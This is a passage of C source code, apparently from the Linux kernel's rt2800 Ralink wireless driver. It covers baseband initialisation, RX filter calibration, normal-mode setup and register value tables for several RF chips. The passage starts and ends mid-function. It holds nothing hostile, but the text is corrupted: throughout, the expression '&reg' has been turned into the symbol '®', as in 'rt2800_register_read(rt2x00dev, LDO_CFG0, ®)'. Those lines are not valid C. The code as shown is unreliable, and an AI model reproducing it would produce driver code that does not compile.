rt2800_bbp_write(rt2x00dev, 84, 0x19);
if (rt2x00_rt_rev_gte(rt2x00dev, RT5592, REV_RT5592C))
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
}
static void rt2800_init_bbp(struct rt2x00_dev *rt2x00dev)
{
unsigned int i;
u16 eeprom;
u8 reg_id;
u8 value;
if (rt2800_is_305x_soc(rt2x00dev))
rt2800_init_bbp_305x_soc(rt2x00dev);
switch (rt2x00dev->chip.rt) {
case RT2860:
case RT2872:
case RT2883:
rt2800_init_bbp_28xx(rt2x00dev);
break;
case RT3070:
case RT3071:
case RT3090:
rt2800_init_bbp_30xx(rt2x00dev);
break;
case RT3290:
rt2800_init_bbp_3290(rt2x00dev);
break;
case RT3352:
rt2800_init_bbp_3352(rt2x00dev);
break;
case RT3390:
rt2800_init_bbp_3390(rt2x00dev);
break;
case RT3572:
rt2800_init_bbp_3572(rt2x00dev);
break;
case RT3593:
rt2800_init_bbp_3593(rt2x00dev);
return;
case RT5390:
case RT5392:
rt2800_init_bbp_53xx(rt2x00dev);
break;
case RT5592:
rt2800_init_bbp_5592(rt2x00dev);
return;
}
for (i = 0; i < EEPROM_BBP_SIZE; i++) {
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_BBP_START, i,
&eeprom);
if (eeprom != 0xffff && eeprom != 0x0000) {
reg_id = rt2x00_get_field16(eeprom, EEPROM_BBP_REG_ID);
value = rt2x00_get_field16(eeprom, EEPROM_BBP_VALUE);
rt2800_bbp_write(rt2x00dev, reg_id, value);
}
}
}
static void rt2800_led_open_drain_enable(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
rt2800_register_read(rt2x00dev, OPT_14_CSR, ®);
rt2x00_set_field32(®, OPT_14_CSR_BIT0, 1);
rt2800_register_write(rt2x00dev, OPT_14_CSR, reg);
}
static u8 rt2800_init_rx_filter(struct rt2x00_dev *rt2x00dev, bool bw40,
u8 filter_target)
{
unsigned int i;
u8 bbp;
u8 rfcsr;
u8 passband;
u8 stopband;
u8 overtuned = 0;
u8 rfcsr24 = (bw40) ? 0x27 : 0x07;
rt2800_rfcsr_write(rt2x00dev, 24, rfcsr24);
rt2800_bbp_read(rt2x00dev, 4, &bbp);
rt2x00_set_field8(&bbp, BBP4_BANDWIDTH, 2 * bw40);
rt2800_bbp_write(rt2x00dev, 4, bbp);
rt2800_rfcsr_read(rt2x00dev, 31, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR31_RX_H20M, bw40);
rt2800_rfcsr_write(rt2x00dev, 31, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 22, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR22_BASEBAND_LOOPBACK, 1);
rt2800_rfcsr_write(rt2x00dev, 22, rfcsr);
/*
* Set power & frequency of passband test tone
*/
rt2800_bbp_write(rt2x00dev, 24, 0);
for (i = 0; i < 100; i++) {
rt2800_bbp_write(rt2x00dev, 25, 0x90);
msleep(1);
rt2800_bbp_read(rt2x00dev, 55, &passband);
if (passband)
break;
}
/*
* Set power & frequency of stopband test tone
*/
rt2800_bbp_write(rt2x00dev, 24, 0x06);
for (i = 0; i < 100; i++) {
rt2800_bbp_write(rt2x00dev, 25, 0x90);
msleep(1);
rt2800_bbp_read(rt2x00dev, 55, &stopband);
if ((passband - stopband) <= filter_target) {
rfcsr24++;
overtuned += ((passband - stopband) == filter_target);
} else
break;
rt2800_rfcsr_write(rt2x00dev, 24, rfcsr24);
}
rfcsr24 -= !!overtuned;
rt2800_rfcsr_write(rt2x00dev, 24, rfcsr24);
return rfcsr24;
}
static void rt2800_rf_init_calibration(struct rt2x00_dev *rt2x00dev,
const unsigned int rf_reg)
{
u8 rfcsr;
rt2800_rfcsr_read(rt2x00dev, rf_reg, &rfcsr);
rt2x00_set_field8(&rfcsr, FIELD8(0x80), 1);
rt2800_rfcsr_write(rt2x00dev, rf_reg, rfcsr);
msleep(1);
rt2x00_set_field8(&rfcsr, FIELD8(0x80), 0);
rt2800_rfcsr_write(rt2x00dev, rf_reg, rfcsr);
}
static void rt2800_rx_filter_calibration(struct rt2x00_dev *rt2x00dev)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u8 filter_tgt_bw20;
u8 filter_tgt_bw40;
u8 rfcsr, bbp;
/*
* TODO: sync filter_tgt values with vendor driver
*/
if (rt2x00_rt(rt2x00dev, RT3070)) {
filter_tgt_bw20 = 0x16;
filter_tgt_bw40 = 0x19;
} else {
filter_tgt_bw20 = 0x13;
filter_tgt_bw40 = 0x15;
}
drv_data->calibration_bw20 =
rt2800_init_rx_filter(rt2x00dev, false, filter_tgt_bw20);
drv_data->calibration_bw40 =
rt2800_init_rx_filter(rt2x00dev, true, filter_tgt_bw40);
/*
* Save BBP 25 & 26 values for later use in channel switching (for 3052)
*/
rt2800_bbp_read(rt2x00dev, 25, &drv_data->bbp25);
rt2800_bbp_read(rt2x00dev, 26, &drv_data->bbp26);
/*
* Set back to initial state
*/
rt2800_bbp_write(rt2x00dev, 24, 0);
rt2800_rfcsr_read(rt2x00dev, 22, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR22_BASEBAND_LOOPBACK, 0);
rt2800_rfcsr_write(rt2x00dev, 22, rfcsr);
/*
* Set BBP back to BW20
*/
rt2800_bbp_read(rt2x00dev, 4, &bbp);
rt2x00_set_field8(&bbp, BBP4_BANDWIDTH, 0);
rt2800_bbp_write(rt2x00dev, 4, bbp);
}
static void rt2800_normal_mode_setup_3xxx(struct rt2x00_dev *rt2x00dev)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u8 min_gain, rfcsr, bbp;
u16 eeprom;
rt2800_rfcsr_read(rt2x00dev, 17, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR17_TX_LO1_EN, 0);
if (rt2x00_rt(rt2x00dev, RT3070) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3390, REV_RT3390E)) {
if (!rt2x00_has_cap_external_lna_bg(rt2x00dev))
rt2x00_set_field8(&rfcsr, RFCSR17_R, 1);
}
min_gain = rt2x00_rt(rt2x00dev, RT3070) ? 1 : 2;
if (drv_data->txmixer_gain_24g >= min_gain) {
rt2x00_set_field8(&rfcsr, RFCSR17_TXMIXER_GAIN,
drv_data->txmixer_gain_24g);
}
rt2800_rfcsr_write(rt2x00dev, 17, rfcsr);
if (rt2x00_rt(rt2x00dev, RT3090)) {
/* Turn off unused DAC1 and ADC1 to reduce power consumption */
rt2800_bbp_read(rt2x00dev, 138, &bbp);
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH) == 1)
rt2x00_set_field8(&bbp, BBP138_RX_ADC1, 0);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH) == 1)
rt2x00_set_field8(&bbp, BBP138_TX_DAC1, 1);
rt2800_bbp_write(rt2x00dev, 138, bbp);
}
if (rt2x00_rt(rt2x00dev, RT3070)) {
rt2800_rfcsr_read(rt2x00dev, 27, &rfcsr);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F))
rt2x00_set_field8(&rfcsr, RFCSR27_R1, 3);
else
rt2x00_set_field8(&rfcsr, RFCSR27_R1, 0);
rt2x00_set_field8(&rfcsr, RFCSR27_R2, 0);
rt2x00_set_field8(&rfcsr, RFCSR27_R3, 0);
rt2x00_set_field8(&rfcsr, RFCSR27_R4, 0);
rt2800_rfcsr_write(rt2x00dev, 27, rfcsr);
} else if (rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3090) ||
rt2x00_rt(rt2x00dev, RT3390)) {
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 15, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR15_TX_LO2_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 15, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 20, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR20_RX_LO1_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 20, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 21, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR21_RX_LO2_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 21, rfcsr);
}
}
static void rt2800_normal_mode_setup_3593(struct rt2x00_dev *rt2x00dev)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u8 rfcsr;
u8 tx_gain;
rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR50_TX_LO2_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 51, &rfcsr);
tx_gain = rt2x00_get_field8(drv_data->txmixer_gain_24g,
RFCSR17_TXMIXER_GAIN);
rt2x00_set_field8(&rfcsr, RFCSR51_BITS24, tx_gain);
rt2800_rfcsr_write(rt2x00dev, 51, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 38, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR38_RX_LO1_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 38, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 39, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR39_RX_LO2_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR30_RX_VCM, 2);
rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
/* TODO: enable stream mode */
}
static void rt2800_normal_mode_setup_5xxx(struct rt2x00_dev *rt2x00dev)
{
u8 reg;
u16 eeprom;
/* Turn off unused DAC1 and ADC1 to reduce power consumption */
rt2800_bbp_read(rt2x00dev, 138, ®);
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH) == 1)
rt2x00_set_field8(®, BBP138_RX_ADC1, 0);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH) == 1)
rt2x00_set_field8(®, BBP138_TX_DAC1, 1);
rt2800_bbp_write(rt2x00dev, 138, reg);
rt2800_rfcsr_read(rt2x00dev, 38, ®);
rt2x00_set_field8(®, RFCSR38_RX_LO1_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 38, reg);
rt2800_rfcsr_read(rt2x00dev, 39, ®);
rt2x00_set_field8(®, RFCSR39_RX_LO2_EN, 0);
rt2800_rfcsr_write(rt2x00dev, 39, reg);
rt2800_bbp4_mac_if_ctrl(rt2x00dev);
rt2800_rfcsr_read(rt2x00dev, 30, ®);
rt2x00_set_field8(®, RFCSR30_RX_VCM, 2);
rt2800_rfcsr_write(rt2x00dev, 30, reg);
}
static void rt2800_init_rfcsr_305x_soc(struct rt2x00_dev *rt2x00dev)
{
rt2800_rf_init_calibration(rt2x00dev, 30);
rt2800_rfcsr_write(rt2x00dev, 0, 0x50);
rt2800_rfcsr_write(rt2x00dev, 1, 0x01);
rt2800_rfcsr_write(rt2x00dev, 2, 0xf7);
rt2800_rfcsr_write(rt2x00dev, 3, 0x75);
rt2800_rfcsr_write(rt2x00dev, 4, 0x40);
rt2800_rfcsr_write(rt2x00dev, 5, 0x03);
rt2800_rfcsr_write(rt2x00dev, 6, 0x02);
rt2800_rfcsr_write(rt2x00dev, 7, 0x50);
rt2800_rfcsr_write(rt2x00dev, 8, 0x39);
rt2800_rfcsr_write(rt2x00dev, 9, 0x0f);
rt2800_rfcsr_write(rt2x00dev, 10, 0x60);
rt2800_rfcsr_write(rt2x00dev, 11, 0x21);
rt2800_rfcsr_write(rt2x00dev, 12, 0x75);
rt2800_rfcsr_write(rt2x00dev, 13, 0x75);
rt2800_rfcsr_write(rt2x00dev, 14, 0x90);
rt2800_rfcsr_write(rt2x00dev, 15, 0x58);
rt2800_rfcsr_write(rt2x00dev, 16, 0xb3);
rt2800_rfcsr_write(rt2x00dev, 17, 0x92);
rt2800_rfcsr_write(rt2x00dev, 18, 0x2c);
rt2800_rfcsr_write(rt2x00dev, 19, 0x02);
rt2800_rfcsr_write(rt2x00dev, 20, 0xba);
rt2800_rfcsr_write(rt2x00dev, 21, 0xdb);
rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
rt2800_rfcsr_write(rt2x00dev, 23, 0x31);
rt2800_rfcsr_write(rt2x00dev, 24, 0x08);
rt2800_rfcsr_write(rt2x00dev, 25, 0x01);
rt2800_rfcsr_write(rt2x00dev, 26, 0x25);
rt2800_rfcsr_write(rt2x00dev, 27, 0x23);
rt2800_rfcsr_write(rt2x00dev, 28, 0x13);
rt2800_rfcsr_write(rt2x00dev, 29, 0x83);
rt2800_rfcsr_write(rt2x00dev, 30, 0x00);
rt2800_rfcsr_write(rt2x00dev, 31, 0x00);
}
static void rt2800_init_rfcsr_30xx(struct rt2x00_dev *rt2x00dev)
{
u8 rfcsr;
u16 eeprom;
u32 reg;
/* XXX vendor driver do this only for 3070 */
rt2800_rf_init_calibration(rt2x00dev, 30);
rt2800_rfcsr_write(rt2x00dev, 4, 0x40);
rt2800_rfcsr_write(rt2x00dev, 5, 0x03);
rt2800_rfcsr_write(rt2x00dev, 6, 0x02);
rt2800_rfcsr_write(rt2x00dev, 7, 0x60);
rt2800_rfcsr_write(rt2x00dev, 9, 0x0f);
rt2800_rfcsr_write(rt2x00dev, 10, 0x41);
rt2800_rfcsr_write(rt2x00dev, 11, 0x21);
rt2800_rfcsr_write(rt2x00dev, 12, 0x7b);
rt2800_rfcsr_write(rt2x00dev, 14, 0x90);
rt2800_rfcsr_write(rt2x00dev, 15, 0x58);
rt2800_rfcsr_write(rt2x00dev, 16, 0xb3);
rt2800_rfcsr_write(rt2x00dev, 17, 0x92);
rt2800_rfcsr_write(rt2x00dev, 18, 0x2c);
rt2800_rfcsr_write(rt2x00dev, 19, 0x02);
rt2800_rfcsr_write(rt2x00dev, 20, 0xba);
rt2800_rfcsr_write(rt2x00dev, 21, 0xdb);
rt2800_rfcsr_write(rt2x00dev, 24, 0x16);
rt2800_rfcsr_write(rt2x00dev, 25, 0x03);
rt2800_rfcsr_write(rt2x00dev, 29, 0x1f);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F)) {
rt2800_register_read(rt2x00dev, LDO_CFG0, ®);
rt2x00_set_field32(®, LDO_CFG0_BGSEL, 1);
rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL, 3);
rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
} else if (rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3090)) {
rt2800_rfcsr_write(rt2x00dev, 31, 0x14);
rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR6_R2, 1);
rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);
rt2800_register_read(rt2x00dev, LDO_CFG0, ®);
rt2x00_set_field32(®, LDO_CFG0_BGSEL, 1);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1,
&eeprom);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_DAC_TEST))
rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL, 3);
else
rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL, 0);
}
rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
rt2800_register_read(rt2x00dev, GPIO_SWITCH, ®);
rt2x00_set_field32(®, GPIO_SWITCH_5, 0);
rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);
}
rt2800_rx_filter_calibration(rt2x00dev);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E))
rt2800_rfcsr_write(rt2x00dev, 27, 0x03);
rt2800_led_open_drain_enable(rt2x00dev);
rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
static void rt2800_init_rfcsr_3290(struct rt2x00_dev *rt2x00dev)
{
u8 rfcsr;
rt2800_rf_init_calibration(rt2x00dev, 2);
rt2800_rfcsr_write(rt2x00dev, 1, 0x0f);
rt2800_rfcsr_write(rt2x00dev, 2, 0x80);
rt2800_rfcsr_write(rt2x00dev, 3, 0x08);
rt2800_rfcsr_write(rt2x00dev, 4, 0x00);
rt2800_rfcsr_write(rt2x00dev, 6, 0xa0);
rt2800_rfcsr_write(rt2x00dev, 8, 0xf3);
rt2800_rfcsr_write(rt2x00dev, 9, 0x02);
rt2800_rfcsr_write(rt2x00dev, 10, 0x53);
rt2800_rfcsr_write(rt2x00dev, 11, 0x4a);
rt2800_rfcsr_write(rt2x00dev, 12, 0x46);
rt2800_rfcsr_write(rt2x00dev, 13, 0x9f);
rt2800_rfcsr_write(rt2x00dev, 18, 0x02);
rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
rt2800_rfcsr_write(rt2x00dev, 25, 0x83);
rt2800_rfcsr_write(rt2x00dev, 26, 0x82);
rt2800_rfcsr_write(rt2x00dev, 27, 0x09);
rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
rt2800_rfcsr_write(rt2x00dev, 33, 0x00);
rt2800_rfcsr_write(rt2x00dev, 34, 0x05);
rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
rt2800_rfcsr_write(rt2x00dev, 38, 0x85);
rt2800_rfcsr_write(rt2x00dev, 39, 0x1b);
rt2800_rfcsr_write(rt2x00dev, 40, 0x0b);
rt2800_rfcsr_write(rt2x00dev, 41, 0xbb);
rt2800_rfcsr_write(rt2x00dev, 42, 0xd5);
rt2800_rfcsr_write(rt2x00dev, 43, 0x7b);
rt2800_rfcsr_write(rt2x00dev, 44, 0x0e);
rt2800_rfcsr_write(rt2x00dev, 45, 0xa2);
rt2800_rfcsr_write(rt2x00dev, 46, 0x73);
rt2800_rfcsr_write(rt2x00dev, 47, 0x00);
rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
rt2800_rfcsr_write(rt2x00dev, 49, 0x98);
rt2800_rfcsr_write(rt2x00dev, 52, 0x38);
rt2800_rfcsr_write(rt2x00dev, 53, 0x00);
rt2800_rfcsr_write(rt2x00dev, 54, 0x78);
rt2800_rfcsr_write(rt2x00dev, 55, 0x43);
rt2800_rfcsr_write(rt2x00dev, 56, 0x02);
rt2800_rfcsr_write(rt2x00dev, 57, 0x80);
rt2800_rfcsr_write(rt2x00dev, 58, 0x7f);
rt2800_rfcsr_write(rt2x00dev, 59, 0x09);
rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
rt2800_rfcsr_write(rt2x00dev, 61, 0xc1);
rt2800_rfcsr_read(rt2x00dev, 29, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR29_RSSI_GAIN, 3);
rt2800_rfcsr_write(rt2x00dev, 29, rfcsr);
rt2800_led_open_drain_enable(rt2x00dev);
rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
static void rt2800_init_rfcsr_3352(struct rt2x00_dev *rt2x00dev)
{
rt2800_rf_init_calibration(rt2x00dev, 30);
rt2800_rfcsr_write(rt2x00dev, 0, 0xf0);
rt2800_rfcsr_write(rt2x00dev, 1, 0x23);
rt2800_rfcsr_write(rt2x00dev, 2, 0x50);
rt2800_rfcsr_write(rt2x00dev, 3, 0x18);
rt2800_rfcsr_write(rt2x00dev, 4, 0x00);
rt2800_rfcsr_write(rt2x00dev, 5, 0x00);
rt2800_rfcsr_write(rt2x00dev, 6, 0x33);
rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
rt2800_rfcsr_write(rt2x00dev, 8, 0xf1);
rt2800_rfcsr_write(rt2x00dev, 9, 0x02);
rt2800_rfcsr_write(rt2x00dev, 10, 0xd2);
rt2800_rfcsr_write(rt2x00dev, 11, 0x42);
rt2800_rfcsr_write(rt2x00dev, 12, 0x1c);
rt2800_rfcsr_write(rt2x00dev, 13, 0x00);
rt2800_rfcsr_write(rt2x00dev, 14, 0x5a);
rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
rt2800_rfcsr_write(rt2x00dev, 16, 0x01);
rt2800_rfcsr_write(rt2x00dev, 18, 0x45);
rt2800_rfcsr_write(rt2x00dev, 19, 0x02);
rt2800_rfcsr_write(rt2x00dev, 20, 0x00);
rt2800_rfcsr_write(rt2x00dev, 21, 0x00);
rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
rt2800_rfcsr_write(rt2x00dev, 23, 0x00);
rt2800_rfcsr_write(rt2x00dev, 24, 0x00);
rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
rt2800_rfcsr_write(rt2x00dev, 26, 0x00);
rt2800_rfcsr_write(rt2x00dev, 27, 0x03);
rt2800_rfcsr_write(rt2x00dev, 28, 0x03);
rt2800_rfcsr_write(rt2x00dev, 29, 0x00);
rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
rt2800_rfcsr_write(rt2x00dev, 33, 0x00);
rt2800_rfcsr_write(rt2x00dev, 34, 0x01);
rt2800_rfcsr_write(rt2x00dev, 35, 0x03);
rt2800_rfcsr_write(rt2x00dev, 36, 0xbd);
rt2800_rfcsr_write(rt2x00dev, 37, 0x3c);
rt2800_rfcsr_write(rt2x00dev, 38, 0x5f);
rt2800_rfcsr_write(rt2x00dev, 39, 0xc5);
rt2800_rfcsr_write(rt2x00dev, 40, 0x33);
rt2800_rfcsr_write(rt2x00dev, 41, 0x5b);
rt2800_rfcsr_write(rt2x00dev, 42, 0x5b);
rt2800_rfcsr_write(rt2x00dev, 43, 0xdb);
rt2800_rfcsr_write(rt2x00dev, 44, 0xdb);
rt2800_rfcsr_write(rt2x00dev, 45, 0xdb);
rt2800_rfcsr_write(rt2x00dev, 46, 0xdd);
rt2800_rfcsr_write(rt2x00dev, 47, 0x0d);
rt2800_rfcsr_write(rt2x00dev, 48, 0x14);
rt2800_rfcsr_write(rt2x00dev, 49, 0x00);
rt2800_rfcsr_write(rt2x00dev, 50, 0x2d);
rt2800_rfcsr_write(rt2x00dev, 51, 0x7f);
rt2800_rfcsr_write(rt2x00dev, 52, 0x00);
rt2800_rfcsr_write(rt2x00dev, 53, 0x52);
rt2800_rfcsr_write(rt2x00dev, 54, 0x1b);
rt2800_rfcsr_write(rt2x00dev, 55, 0x7f);
rt2800_rfcsr_write(rt2x00dev, 56, 0x00);
rt2800_rfcsr_write(rt2x00dev, 57, 0x52);
rt2800_rfcsr_write(rt2x00dev, 58, 0x1b);
rt2800_rfcsr_write(rt2x00dev, 59, 0x00);
rt2800_rfcsr_write(rt2x00dev, 60, 0x00);
rt2800_rfcsr_write(rt2x00dev, 61, 0x00);
rt2800_rfcsr_write(rt2x00dev, 62, 0x00);
rt2800_rfcsr_write(rt2x00dev, 63, 0x00);
rt2800_rx_filter_calibration(rt2x00dev);
rt2800_led_open_drain_enable(rt2x00dev);
rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
static void rt2800_init_rfcsr_3390(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
rt2800_rf_init_calibration(rt2x00dev, 30);
rt2800_rfcsr_write(rt2x00dev, 0, 0xa0);
rt2800_rfcsr_write(rt2x00dev, 1, 0xe1);
rt2800_rfcsr_write(rt2x00dev, 2, 0xf1);
rt2800_rfcsr_write(rt2x00dev, 3, 0x62);
rt2800_rfcsr_write(rt2x00dev, 4, 0x40);
rt2800_rfcsr_write(rt2x00dev, 5, 0x8b);
rt2800_rfcsr_write(rt2x00dev, 6, 0x42);
rt2800_rfcsr_write(rt2x00dev, 7, 0x34);
rt2800_rfcsr_write(rt2x00dev, 8, 0x00);
rt2800_rfcsr_write(rt2x00dev, 9, 0xc0);
rt2800_rfcsr_write(rt2x00dev, 10, 0x61);
rt2800_rfcsr_write(rt2x00dev, 11, 0x21);
rt2800_rfcsr_write(rt2x00dev, 12, 0x3b);
rt2800_rfcsr_write(rt2x00dev, 13, 0xe0);
rt2800_rfcsr_write(rt2x00dev, 14, 0x90);
rt2800_rfcsr_write(rt2x00dev, 15, 0x53);
rt2800_rfcsr_write(rt2x00dev, 16, 0xe0);
rt2800_rfcsr_write(rt2x00dev, 17, 0x94);
rt2800_rfcsr_write(rt2x00dev, 18, 0x5c);
rt2800_rfcsr_write(rt2x00dev, 19, 0x4a);
rt2800_rfcsr_write(rt2x00dev, 20, 0xb2);
rt2800_rfcsr_write(rt2x00dev, 21, 0xf6);
rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
rt2800_rfcsr_write(rt2x00dev, 23, 0x14);
rt2800_rfcsr_write(rt2x00dev, 24, 0x08);
rt2800_rfcsr_write(rt2x00dev, 25, 0x3d);
rt2800_rfcsr_write(rt2x00dev, 26, 0x85);
rt2800_rfcsr_write(rt2x00dev, 27, 0x00);
rt2800_rfcsr_write(rt2x00dev, 28, 0x41);
rt2800_rfcsr_write(rt2x00dev, 29, 0x8f);
rt2800_rfcsr_write(rt2x00dev, 30, 0x20);
rt2800_rfcsr_write(rt2x00dev, 31, 0x0f);
rt2800_register_read(rt2x00dev, GPIO_SWITCH, ®);
rt2x00_set_field32(®, GPIO_SWITCH_5, 0);
rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);
rt2800_rx_filter_calibration(rt2x00dev);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3390, REV_RT3390E))
rt2800_rfcsr_write(rt2x00dev, 27, 0x03);
rt2800_led_open_drain_enable(rt2x00dev);
rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
static void rt2800_init_rfcsr_3572(struct rt2x00_dev *rt2x00dev)
{
u8 rfcsr;
u32 reg;
rt2800_rf_init_calibration(rt2x00dev, 30);
rt2800_rfcsr_write(rt2x00dev, 0, 0x70);
rt2800_rfcsr_write(rt2x00dev, 1, 0x81);
rt2800_rfcsr_write(rt2x00dev, 2, 0xf1);
rt2800_rfcsr_write(rt2x00dev, 3, 0x02);
rt2800_rfcsr_write(rt2x00dev, 4, 0x4c);
rt2800_rfcsr_write(rt2x00dev, 5, 0x05);
rt2800_rfcsr_write(rt2x00dev, 6, 0x4a);
rt2800_rfcsr_write(rt2x00dev, 7, 0xd8);
rt2800_rfcsr_write(rt2x00dev, 9, 0xc3);
rt2800_rfcsr_write(rt2x00dev, 10, 0xf1);
rt2800_rfcsr_write(rt2x00dev, 11, 0xb9);
rt2800_rfcsr_write(rt2x00dev, 12, 0x70);
rt2800_rfcsr_write(rt2x00dev, 13, 0x65);
rt2800_rfcsr_write(rt2x00dev, 14, 0xa0);
rt2800_rfcsr_write(rt2x00dev, 15, 0x53);
rt2800_rfcsr_write(rt2x00dev, 16, 0x4c);
rt2800_rfcsr_write(rt2x00dev, 17, 0x23);
rt2800_rfcsr_write(rt2x00dev, 18, 0xac);
rt2800_rfcsr_write(rt2x00dev, 19, 0x93);
rt2800_rfcsr_write(rt2x00dev, 20, 0xb3);
rt2800_rfcsr_write(rt2x00dev, 21, 0xd0);
rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
rt2800_rfcsr_write(rt2x00dev, 23, 0x3c);
rt2800_rfcsr_write(rt2x00dev, 24, 0x16);
rt2800_rfcsr_write(rt2x00dev, 25, 0x15);
rt2800_rfcsr_write(rt2x00dev, 26, 0x85);
rt2800_rfcsr_write(rt2x00dev, 27, 0x00);
rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
rt2800_rfcsr_write(rt2x00dev, 29, 0x9b);
rt2800_rfcsr_write(rt2x00dev, 30, 0x09);
rt2800_rfcsr_write(rt2x00dev, 31, 0x10);
rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR6_R2, 1);
rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);
rt2800_register_read(rt2x00dev, LDO_CFG0, ®);
rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL, 3);
rt2x00_set_field32(®, LDO_CFG0_BGSEL, 1);
rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
msleep(1);
rt2800_register_read(rt2x00dev, LDO_CFG0, ®);
